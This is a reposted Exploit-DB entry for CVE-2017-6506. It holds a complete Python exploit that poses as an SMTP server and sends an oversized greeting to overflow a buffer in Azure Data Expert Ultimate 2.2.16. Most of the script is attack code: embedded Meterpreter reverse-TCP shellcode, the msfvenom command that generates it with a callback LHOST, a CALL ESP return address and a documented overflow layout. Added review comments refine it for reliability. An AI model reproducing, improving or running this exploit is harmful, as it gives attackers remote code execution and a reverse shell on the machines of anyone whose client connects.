Azure Data Expert Ultimate 2.2.16 – Remote Buffer Overflow

  • 作者: Peter Baris
    日期: 2017-03-07
  • 来源:https://www.exploit-db.com/exploits/41545/
  • # Exploit Title: Azure Data Expert Ultimate 2.2.16 – buffer overflow
    # Date: 2017-03-07
    # Exploit Author: Peter Baris
    # Vendor Homepage: http://www.saptech-erp.com.au
    # Software Link: http://www.azuredex.com/downloads.html
    # Version: 2.2.16
    # Tested on: Windows Server 2008 R2 Standard x64
    # CVE : CVE-2017-6506
    
    # The same technique is used in the SysGauge exploit; this version adds an explicit check that each shellcode part fits its slot before the listener starts.
    
    import socket
    import sys
    
    # Return-address overwrite: CALL ESP at 0x6527635E inside QtGui4.dll.
    # Stored least-significant byte first so it lands in EIP in the right order;
    # the name "jmp" is historical, the gadget is a CALL ESP.
    jmp = "".join(chr(b) for b in (0x5e, 0x63, 0x27, 0x65))
    # Eight-byte NOP sled placed directly in front of the first shellcode part.
    nops = "".join(["\x90"] * 8)
    
    
    # First 232 bytes of a 306-byte windows/meterpreter/reverse_tcp payload
    # (the remaining 74 bytes are rev_met_2 below). This half is placed AFTER
    # the overwritten return address, behind the 12 filler bytes and the NOP
    # sled, so it is what CALL ESP eventually runs into.
    # NOTE(review): the original comment listed the bad chars as
    # \x00\x0a\x0b\x20, but the msfvenom command below excludes \x00\x0a\x0d\x20,
    # and the bytes themselves contain \x0b (third line) and no \x0d -- so the
    # command line is the accurate record. CR/LF presumably end the SMTP
    # greeting line on the client, which is why \x0d and \x0a are excluded.
    # Regenerate with your own LHOST/LPORT using exactly this bad-char list.
    # msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.198.128 LPORT=4444 -f c -b \x00\x0a\x0d\x20 --smallest
    # Keep the split point so that len(rev_met_1) < 236 and len(rev_met_2) < 76,
    # the limits the script enforces before listening.

    rev_met_1=("\x6a\x47\x59\xd9\xee\xd9\x74\x24\xf4\x5b\x81\x73\x13\x1f\x2d"
    "\x97\x97\x83\xeb\xfc\xe2\xf4\xe3\xc5\x15\x97\x1f\x2d\xf7\x1e"
    "\xfa\x1c\x57\xf3\x94\x7d\xa7\x1c\x4d\x21\x1c\xc5\x0b\xa6\xe5"
    "\xbf\x10\x9a\xdd\xb1\x2e\xd2\x3b\xab\x7e\x51\x95\xbb\x3f\xec"
    "\x58\x9a\x1e\xea\x75\x65\x4d\x7a\x1c\xc5\x0f\xa6\xdd\xab\x94"
    "\x61\x86\xef\xfc\x65\x96\x46\x4e\xa6\xce\xb7\x1e\xfe\x1c\xde"
    "\x07\xce\xad\xde\x94\x19\x1c\x96\xc9\x1c\x68\x3b\xde\xe2\x9a"
    "\x96\xd8\x15\x77\xe2\xe9\x2e\xea\x6f\x24\x50\xb3\xe2\xfb\x75"
    "\x1c\xcf\x3b\x2c\x44\xf1\x94\x21\xdc\x1c\x47\x31\x96\x44\x94"
    "\x29\x1c\x96\xcf\xa4\xd3\xb3\x3b\x76\xcc\xf6\x46\x77\xc6\x68"
    "\xff\x72\xc8\xcd\x94\x3f\x7c\x1a\x42\x45\xa4\xa5\x1f\x2d\xff"
    "\xe0\x6c\x1f\xc8\xc3\x77\x61\xe0\xb1\x18\xd2\x42\x2f\x8f\x2c"
    "\x97\x97\x36\xe9\xc3\xc7\x77\x04\x17\xfc\x1f\xd2\x42\xfd\x1a"
    "\x45\x57\x3f\xd9\xad\xff\x95\x1f\x3c\xcb\x1e\xf9\x7d\xc7\xc7"
    "\x4f\x6d\xc7\xd7\x4f\x45\x7d\x98\xc0\xcd\x68\x42\x88\x47\x87"
    "\xc1\x48\x45\x0e\x32\x6b\x4c")
    
    
    # Bytes 232-305 of the same payload (74 bytes), placed BEFORE the
    # overwritten return address: it sits at offset 176 of the overflow string,
    # followed by two filler bytes and then the return address at offset 252.
    # NOTE(review): how execution gets from the end of rev_met_1 (which runs
    # first, after CALL ESP) back to this half is not visible in this file; it
    # relies on the SysGauge technique the header cites. Do not move the split
    # point or this placement without re-verifying the flow in a debugger.
    rev_met_2=("\x68\x42\x9a\xed\xe3\x9b\xe0\x63"
    "\x9f\xe2\xf3\x45\x67\x22\xbd\x7b\x68\x42\x75\x2d\xfd\x93\x49"
    "\x7a\xff\x95\xc6\xe5\xc8\x68\xca\xa6\xa1\xfd\x5f\x45\x97\x87"
    "\x1f\x2d\xc1\xfd\x1f\x45\xcf\x33\x4c\xc8\x68\x42\x8c\x7e\xfd"
    "\x97\x49\x7e\xc0\xff\x1d\xf4\x5f\xc8\xe0\xf8\x96\x54\x36\xeb"
    "\xe2\x79\xdc\x2d\x97\x97")
    
    
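    # --- overflow layout -------------------------------------------------------
    # Offsets into the string that follows "220 " in the greeting:
    #   [0, 176)     filler
    #   [176, 252)   rev_met_2, padded with filler to exactly PRE_EIP_SLOT bytes
    #   [252, 256)   saved return address -> CALL ESP in QtGui4.dll
    #   [256, 268)   12 filler bytes stepped over after the return
    #   [268, 276)   NOP sled
    #   [276, ...)   rev_met_1
    # The original build hard-coded 2 bytes of padding after rev_met_2, so any
    # part-2 length other than 74 silently moved the return-address overwrite
    # away from offset 252 even though the length check accepts up to 75 bytes.
    # Padding to the slot size keeps the offset stable for every accepted length.
    PRE_EIP_PAD = 176         # filler before the first shellcode part
    PRE_EIP_SLOT = 76         # room between that filler and the return address
    POST_EIP_PAD = 12         # filler between the return address and the NOP sled
    MAX_PART1 = 236           # len(rev_met_1) must stay strictly below this
    MAX_PART2 = PRE_EIP_SLOT  # len(rev_met_2) must stay strictly below this

    # Listener settings. 0.0.0.0 answers on every interface, so any client that
    # connects is served the malicious greeting; on a shared network bind to the
    # lab interface's address instead.
    port = 25
    ip = '0.0.0.0'


    def check_shellcode(part1, part2):
        """Return None when both shellcode parts fit, otherwise an error message.

        The limits are the ones the original script enforced (strictly less
        than MAX_PART1 / MAX_PART2 bytes) and the messages are unchanged.
        """
        if len(part1) >= MAX_PART1:
            return '[!] Shellcode part 1 is too long (' + str(len(part1)) + '). Exiting.'
        if len(part2) >= MAX_PART2:
            return '[!] Shellcode part 2 is too long(' + str(len(part2)) + '). Exiting.'
        return None


    def build_payload(part1, part2, ret, nop_sled):
        """Assemble the overflow string in the layout documented above.

        part1 / part2 are the two shellcode halves (rev_met_1 / rev_met_2),
        ret the 4-byte little-endian return address and nop_sled the sled placed
        in front of part1. Raises ValueError when part2 does not fit its slot,
        because the return address would otherwise land at the wrong offset.
        """
        if len(part2) > PRE_EIP_SLOT:
            raise ValueError('shellcode part 2 (%d bytes) exceeds the %d-byte slot'
                             % (len(part2), PRE_EIP_SLOT))
        before_ret = "A" * PRE_EIP_PAD + part2 + "A" * (PRE_EIP_SLOT - len(part2))
        return before_ret + ret + "B" * POST_EIP_PAD + nop_sled + part1


    def payload_bytes(text):
        """Return text as raw bytes, one byte per character.

        The shellcode is written as hex-escape str literals: on Python 2 those
        are already bytes, on Python 3 they are str and must be encoded 1:1
        (latin-1) -- a UTF-8 encode would expand every byte >= 0x80 and corrupt
        the shellcode.
        """
        if isinstance(text, bytes):
            return text
        return text.encode('latin-1')


    def serve(bind_ip, bind_port, payload):
        """Accept connections on bind_ip:bind_port and send each client the malicious 220 greeting.

        Runs until interrupted. The listening socket and every accepted
        connection are closed on the way out (the original left both open).
        """
        greeting = payload_bytes('220 ' + payload + '\r\n')
        listener = socket.socket()
        # Allow an immediate restart after Ctrl-C instead of waiting out TIME_WAIT.
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        try:
            listener.bind((bind_ip, bind_port))
            listener.listen(5)
            print('Listening on SMTP port: ' + str(bind_port))
            while True:
                conn, addr = listener.accept()
                try:
                    # sendall: a short send() would truncate the overflow string.
                    conn.sendall(greeting)
                finally:
                    conn.close()
        finally:
            listener.close()


    def main():
        """Validate the shellcode sizes before binding anything, then listen."""
        problem = check_shellcode(rev_met_1, rev_met_2)
        if problem is not None:
            print(problem)
            sys.exit(1)
        serve(ip, port, build_payload(rev_met_1, rev_met_2, jmp, nops))


    if __name__ == "__main__":
        main()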